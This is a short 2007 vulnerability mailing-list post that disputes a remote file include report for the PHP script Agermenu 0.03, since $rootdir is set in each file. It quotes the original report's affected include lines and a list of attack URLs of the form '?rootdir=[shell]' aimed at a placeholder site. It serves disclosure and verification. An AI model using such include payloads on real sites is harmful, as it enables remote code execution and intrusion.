[VIM] false: Agermenu 0.03

str0ke str0ke at milw0rm.com
Wed Feb 7 15:56:45 EST 2007 

$rootdir is defined on the top line of index.php and the rest.

/str0ke

Name: Agermenu 0.03 - Remote File Include Vulnerability

Script: http://www.chbs.dk/proj/agermenu/agermenu-0.03.tgz
*****************
ERROR:

index.php  ->   include $rootdir."inc/top.inc.php"; (line 4)
index.php  ->   include $rootdir."inc/bottom.inc.php"; (line 24)

about/contribute.php?rootdir=[shell]    ->   include
$rootdir."inc/top.inc.php"; (line 5)
about/contribute.php?rootdir=[shell]    ->   include
$rootdir."inc/bottom.inc.php"; (line 32)
**************************************************************************************
about/index.php?rootdir=[shell]  ->   include
$rootdir."inc/top.inc.php"; (line 5)
about/index.php?rootdir=[shell]  ->   include
$rootdir."inc/bottom.inc.php";     (line 20)
**************************************************************************************
about/using.php?rootdir=[shell]  ->   include
$rootdir."inc/top.inc.php"; (line 5 , 50)
about/using.php?rootdir=[shell]  ->   include
$rootdir."inc/bottom.inc.php"; (line 67, 78)
**************************************************************************************
about/licenses/index.php?rootdir=[shell]  ->   include
$rootdir."inc/top.inc.php"; (line 5)
about/licenses/index.php?rootdir=[shell]  ->   include
$rootdir."inc/bottom.inc.php"; (line 30)
**************************************************************************************
kvastmo/index.php?rootdir=[shell] ->   include
$rootdir."inc/top.inc.php"; (line 5)
kvastmo/index.php?rootdir=[shell] ->   include
$rootdir."inc/bottom.inc.php"; (line 39)
**************************************************************************************
And more .. almost all files have the include $rootdir ;)  for the
rest download the script (above)
**************************************************************************************
RFI:

http://www.SITE.com/path/index.php?rootdir=[shell]
http://www.SITE.com/path/about/contribute.php?rootdir=[shell]
http://www.SITE.com/path/about/index.php?rootdir=[shell]
http://www.SITE.com/path/about/using.php?rootdir=[shell]
http://www.SITE.com/path/about/licenses/index.php?rootdir=[shell]
http://www.SITE.com/path/kvastmo/index.php?rootdir=[shell]
**************************************************************************************

More information about the VIM mailing list